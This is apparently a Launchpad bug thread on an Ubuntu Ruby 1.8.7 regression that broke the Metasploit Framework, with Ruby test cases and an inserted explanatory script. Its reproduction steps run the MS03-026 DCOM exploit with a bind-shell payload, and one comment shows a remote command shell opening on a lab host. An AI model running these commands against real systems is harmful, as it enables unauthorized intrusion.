Ruby 1.8 package breaks the Metasploit Framework (short-named constants)

Bug #282302 reported by HD Moore
Affects            Status        Importance  Assigned to       Milestone
ruby1.8 (Debian)   Fix Released  Unknown
ruby1.8 (Ubuntu)   Fix Released  Medium      Jamie Strandboge
  Intrepid         Fix Released  Medium      Jamie Strandboge
  Jaunty           Fix Released  Medium      Jamie Strandboge

Bug Description

Binary package hint: ruby1.8

The current stable release of the Ruby interpreter (1.8.7 in Ibex) breaks any software using short-named constants. The latest stable version from ruby-lang.org has this issue as well, but it has been fixed in the latest stable snapshot.

To summarize, this version is bad: ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.7-p72.tar.gz

This version is corrected: ftp://ftp.ruby-lang.org/pub/ruby/stable-snapshot.tar.gz

When the bug triggers, it looks something like:
[-] Exploit failed: uninitialized constant Msf::ModuleSet::NDR

Since we recommend Ubuntu as a stable platform for the Metasploit Framework, we would really like to see 8.10 ship with a working version of the Ruby interpreter.

Revision history for this message
Nick Barcet (nijaba) wrote :

Thanks a lot for taking the time to report this issue and help us make Ubuntu better.
Could you please provide us with a step by step way to reproduce this issue?
Also, would you know exactly which commit fixed the problem between the two releases?

Changed in ruby1.8:
status: New → Incomplete
Jamie Strandboge (jdstrand) wrote :

Thank you for using Ubuntu and taking the time to report a bug. I reviewed the changelog and svn log for ruby 1.8 when this report came in and again just now, but nothing jumped out at me for fixing short-named constants. Do you know which commit fixed the problem? Also, can you provide a small test case for where short-named constants fail?

I have milestoned this to be fixed in intrepid-updates after release. If the commit can be quickly found and it is not too intrusive, it might be possible to update ruby1.8 before release. Thanks for your help on this!

Changed in ruby1.8:
assignee: nobody → jdstrand
importance: Undecided → Medium
milestone: none → intrepid-updates
HD Moore (hdm-metasploit) wrote :

Sure, let me write a script that demonstrates the bug; it's a little tricky because it only occurs in some convoluted Ruby objects (classes which inherit from mixins which define short-name constants, with a different base class than the class which includes them). I had a link to the Ruby patch which solved this, but need to dig it up again.

HD Moore (hdm-metasploit) wrote :

I was not able to trigger this with a standalone test case, but it is easy to reproduce using the svn version of the Metasploit Framework. The example below assumes you have a Windows server somewhere with port 135 open:

$ svn co http://metasploit.com/svn/framework3/trunk/ msf3
$ ruby msf3/msfcli exploit/windows/dcerpc/ms03_026_dcom PAYLOAD=windows/shell/bind_tcp RHOST=10.10.10.250 E
(change 10.10.10.250 to a machine with DCOM open, patch level does not matter)

[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.10.10.250[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.10.10.250[135] ...
[-] Exploit failed: uninitialized constant Msf::ModuleSet::NDR

A working/patched version of Ruby will not trigger that "uninitialized constant" error.

-HD

Jamie Strandboge (jdstrand) wrote :

Marking as Confirmed. I was able to reproduce it, but haven't found the patch yet.

Changed in ruby1.8:
status: Incomplete → Confirmed
HD Moore (hdm-metasploit) wrote :
Jamie Strandboge (jdstrand) wrote :

Thanks! The patch fixes metasploit, but does not bring the behavior back to 1.8.6 as described in the test case url that is provided. E.g.:
class A
   @@a = 'A'
   def a=(x)
      @@a = x
   end
   def a
      @@a
   end
end

B = A.dup
B.new.a = 'B'

# should show 'B'
p A.new.a

The above still shows 'A' in patched 1.8.7, but is 'B' in 1.8.6.

The following:
class A
  Const = 'A'
  def foo
    p Const
  end
end

B = A.dup

class B
  Const = 'B'
end

p A::Const
A.new.foo
p B::Const
B.new.foo

This should display:
"A"
"A"
"B"
"A"

But on patched 1.8.7 I got:
/tmp/35116b.rb:11: warning: already initialized constant Const
"A"
"A"
"B"
"B"

That said, unpatched 1.8.7 still shows 'A' in the first test, but the second results in:
/tmp/35116b.rb:11: warning: already initialized constant Const
"A"
"A"
"B"
/tmp/35116b.rb:4:in `foo': uninitialized constant Const (NameError)
 from /tmp/35116b.rb:19

So clearly, the patch partially addresses this test case. Does the stable ruby snapshot work the same as 1.8.6 in the above test cases?

HD Moore (hdm-metasploit) wrote :

From the looks of it, even though the behavior is different between 1.8.6 and 1.8.7-patched, it was addressing an ambiguity in the first place and the 1.8.7-patched behavior should be considered correct. The 8.10 release has shipped with the broken 1.8.7 interpreter and no way for users to downgrade to 1.8.6. Any chance a new package can be pushed fairly soon for 8.10?

Jamie Strandboge (jdstrand) wrote :

Based on this information, I will prepare an SRU. Thanks for the feedback. :)

HD Moore (hdm-metasploit) wrote :

Was there anything special about the 1.8.7 that was shipped with 8.10? One of our users is hitting this error, but our test case to detect the buggy version is not firing, even though it works fine for the 1.8.7 release from the ruby web site:

#
# Check for the ugly 1.8.7 short-named constants bug
#

class ConstBugTestA
        Const = 'A'
        def test
                Const == 'A'
        end
end

ConstBugTestC = ConstBugTestA.dup

class ConstBugTestB < ConstBugTestC
        Const = 'B'
end

def ruby_187_const_bug
        bugged = false

        begin
                ConstBugTestA.new.test()
                ConstBugTestB.new.test()
        rescue ::NameError
                bugged = true
        end

        bugged
end

if(ruby_187_const_bug())
        $stderr.puts ""
        $stderr.puts "***********************************************************************"
        $stderr.puts "***                                                                   *"
        $stderr.puts "*** This version of the Ruby interpreter has significant problems, we *"
        $stderr.puts "*** strongly recommend that you switch to version 1.8.6 until these   *"
        $stderr.puts "*** issues have been corrected. Alternatively, you can download,      *"
        $stderr.puts "*** build, and install the latest Ruby snapshot from:                 *"
        $stderr.puts "*** - http://www.ruby-lang.org/                                       *"
        $stderr.puts "*** For more information, please see the following URL:               *"
        $stderr.puts "*** - https://bugs.launchpad.net/bugs/282302                          *"
        $stderr.puts "***                                                                   *"
        $stderr.puts "***********************************************************************"
        $stderr.puts ""
end
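The following script is an added example; it is not code from the bug report, the Ubuntu package or the Metasploit Framework. It puts the two lookup rules behind Jamie's test cases above side by side (a bare `Const`, resolved lexically, versus `self.class::Const`, resolved through the receiver) and turns HD's startup check into a function that returns a structured report instead of printing a banner, so a program can log the result or refuse to start on it. The class and method names (LookupBase, LookupChild, LookupCopy, const_bug_present?, interpreter_report) are constructed for the example. On a current interpreter the probe reports no bug; the NameError branch is only exercised on the broken 1.8.7-p72 build described in this thread.

```ruby
# Added example: not code from the bug report, the Ubuntu package or the
# Metasploit Framework. Class and method names are constructed for the demo.
# Written in 1.8-compatible syntax so it can be run against old interpreters.

# --- Lexical vs. dynamic constant lookup ------------------------------------

class LookupBase
  Const = 'base'

  # A bare constant name is resolved lexically, i.e. through the class the
  # method body was written in (LookupBase), whatever the receiver's class is.
  def lexical_const
    Const
  end

  # self.class::Const is resolved through the receiver's class and its
  # ancestors, so every subclass or copy sees its own value.
  def dynamic_const
    self.class::Const
  end
end

class LookupChild < LookupBase
  Const = 'child'
end

# A duplicated class, as in the thread's test cases. dup copies the constant
# table, so remove the copy first to avoid the "already initialized constant"
# warning that plain reassignment produces.
LookupCopy = LookupBase.dup
LookupCopy.send(:remove_const, :Const)
LookupCopy.const_set(:Const, 'copy')

def lookup_results
  {
    :base_lexical  => LookupBase.new.lexical_const,   # 'base'
    :child_lexical => LookupChild.new.lexical_const,  # 'base': lexical scope is LookupBase
    :child_dynamic => LookupChild.new.dynamic_const,  # 'child'
    :copy_dynamic  => LookupCopy.new.dynamic_const,   # 'copy'
    # 'base' on 1.8.6, 'copy' on patched 1.8.7 (the thread's second test case);
    # NameError on the unpatched 1.8.7-p72 package.
    :copy_lexical  => LookupCopy.new.lexical_const
  }
end

# --- Startup probe that returns a report instead of printing a banner -------

# Behavioural probe: on the broken interpreter the lexical lookup through the
# duplicated class raised NameError; any value coming back means lookup works.
def const_bug_present?
  LookupBase.new.lexical_const
  LookupCopy.new.lexical_const
  false
rescue NameError
  true
end

# Compare versions element-wise ("1.10.0" sorts after "1.9.3" as arrays,
# but before it as strings).
def parse_version(str)
  str.split('.').map { |part| part.to_i }
end

def version_at_least?(current, minimum)
  (parse_version(current) <=> parse_version(minimum)) >= 0
end

# A version string alone cannot decide: the fixed Ubuntu package
# (1.8.7.72-1ubuntu0.1, upstream p72 plus a distribution patch) still
# identifies itself as 1.8.7, so the behavioural probe is the authoritative signal.
def interpreter_report
  {
    :version    => RUBY_VERSION,
    :patchlevel => (defined?(RUBY_PATCHLEVEL) ? RUBY_PATCHLEVEL : nil),
    :const_bug  => const_bug_present?
  }
end

if __FILE__ == $0
  r = interpreter_report
  puts "ruby #{r[:version]} patchlevel #{r[:patchlevel].inspect} const_bug=#{r[:const_bug]}"
  lookup_results.each { |name, value| puts "#{name}: #{value}" }
end
```

The report separates what the interpreter says it is from how it behaves. Gating only on `RUBY_VERSION`/`RUBY_PATCHLEVEL` would flag the patched Ubuntu package and pass an unpatched upstream p72 tarball built from source, which is the mismatch discussed in the comments above; the behavioural probe gets both cases right.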

Jamie Strandboge (jdstrand) wrote :

Nothing special was done with the 8.10 release. When I checked the svn version of metasploit on 8.10 before release, I received the warning message just fine.

I'm preparing an updated version for 9.04, and will then work on the 8.10 version.

Changed in ruby1.8:
assignee: nobody → jdstrand
importance: Undecided → Medium
milestone: none → intrepid-updates
status: New → Confirmed
milestone: intrepid-updates → none
relik (dkennedy) wrote :

Any idea when these changes will be committed? Been staying away from Intrepid until changes for metasploit were implemented....

Thanks!

Launchpad Janitor (janitor) wrote :

This bug was fixed in the package ruby1.8 - 1.8.7.72-1ubuntu1

---------------
ruby1.8 (1.8.7.72-1ubuntu1) jaunty; urgency=low

  * debian/patches/905_short_named_constants.dpatch: Fix for short-named
    constants regression (LP: #282302)

 -- Jamie Strandboge <email address hidden> Mon, 27 Oct 2008 12:18:35 -0500

Changed in ruby1.8:
status: Confirmed → Fix Released
Jamie Strandboge (jdstrand) wrote :

Impact: this regression breaks (at least) the metasploit framework. It appears that short-named constants are not generally in widespread use (based on community feedback and lack of other bug reports).

Development release: applied the exact patch to 9.04 in 1.8.7.72-1ubuntu1. This is from http://svn.ruby-lang.org/cgi-bin/viewvc.cgi?view=rev&revision=18485, and is already in upstream's stable snapshot. Debdiff for the upload is attached.

TEST CASE (from HD Moore):
The example below assumes you have a Windows server somewhere with port 135 open:

$ svn co http://metasploit.com/svn/framework3/trunk/ msf3
$ ruby msf3/msfcli exploit/windows/dcerpc/ms03_026_dcom PAYLOAD=windows/shell/bind_tcp RHOST=10.10.10.250 E
(change 10.10.10.250 to a machine with DCOM open, patch level does not matter)

[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.10.10.250[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.10.10.250[135] ...
[-] Exploit failed: uninitialized constant Msf::ModuleSet::NDR

A working/patched version of Ruby will not trigger that "uninitialized constant" error.

Regression potential: appears low due to the perceived infrequency of using short-named constants

Changed in ruby1.8:
status: Confirmed → In Progress
Martin Pitt (pitti) wrote :

Accepted into intrepid-proposed, please test and give feedback here. Please see https://wiki.ubuntu.com/Testing/EnableProposed for documentation how to enable and use -proposed. Thank you in advance!

Changed in ruby1.8:
milestone: intrepid-updates → none
status: In Progress → Fix Committed
relik (dkennedy) wrote :

I can confirm that intrepid-proposed package does fix the short-named constants issue in Metasploit.

relik (dkennedy) wrote :

POC:

root@sslinuxvm12:/pentest/exploits/framework3# ./msfcli exploit/windows/dcerpc/ms03_026_dcom PAYLOAD=windows/shell/bind_tcp RHOST=10.211.55.5 E
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.211.55.5[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.211.55.5[135] ...
[*] Sending exploit ...
[*] The DCERPC service did not reply to our request
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (10.211.55.3:39156 -> 10.211.55.5:4444)

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>

Jamie Strandboge (jdstrand) wrote :

$ apt-cache policy ruby1.8
ruby1.8:
  Installed: 1.8.7.72-1ubuntu0.1
  Candidate: 1.8.7.72-1ubuntu0.1
  Version table:
 *** 1.8.7.72-1ubuntu0.1 0
        500 http://archive.ubuntu.com intrepid-proposed/main Packages
        100 /var/lib/dpkg/status
     1.8.7.72-1 0
        500 http://192.168.122.1 intrepid/main Packages

Before upgrade:
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.122.208[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.122.208[135] ...
[-] Exploit failed: uninitialized constant Msf::ModuleSet::NDR

After upgrade:
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.122.208[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.122.208[135] ...
[*] Sending exploit ...
...

New version also passes (the somewhat limited) qa-regression-testing with no regressions. The build system also has a test suite that is run by default (and obviously passed).

relik (dkennedy) wrote :

Can we get this released to intrepid yet? I have it working perfectly in intrepid with intrepid-proposed... The sooner this gets pushed the better :)

Launchpad Janitor (janitor) wrote :

This bug was fixed in the package ruby1.8 - 1.8.7.72-1ubuntu0.1

---------------
ruby1.8 (1.8.7.72-1ubuntu0.1) intrepid-proposed; urgency=low

  * debian/patches/905_short_named_constants.dpatch: Fix for short-named
    constants regression (LP: #282302)

 -- Jamie Strandboge <email address hidden> Thu, 20 Nov 2008 13:24:03 -0600

Changed in ruby1.8:
status: Fix Committed → Fix Released
Martin Pitt (pitti) wrote :

Copied to intrepid-updates.

mikhailov.tolya (mikhailov-anatoly) wrote :

I have found much advice on how to downgrade Ruby 1.8.7 to 1.8.6, as recommended by the Rails core team.
You can find the article at
http://railsgeek.com/2008/11/27/ubuntu-8-10-downgrade-ruby-1-8-7-to-1-8-6

Jamie Strandboge (jdstrand) wrote :

mikhailov,

There shouldn't be a need to downgrade as the packages are fixed. If you are continuing to have problems with 1.8.7.72-1ubuntu0.1, please report them here.

Changed in ruby1.8 (Debian):
status: Unknown → Fix Released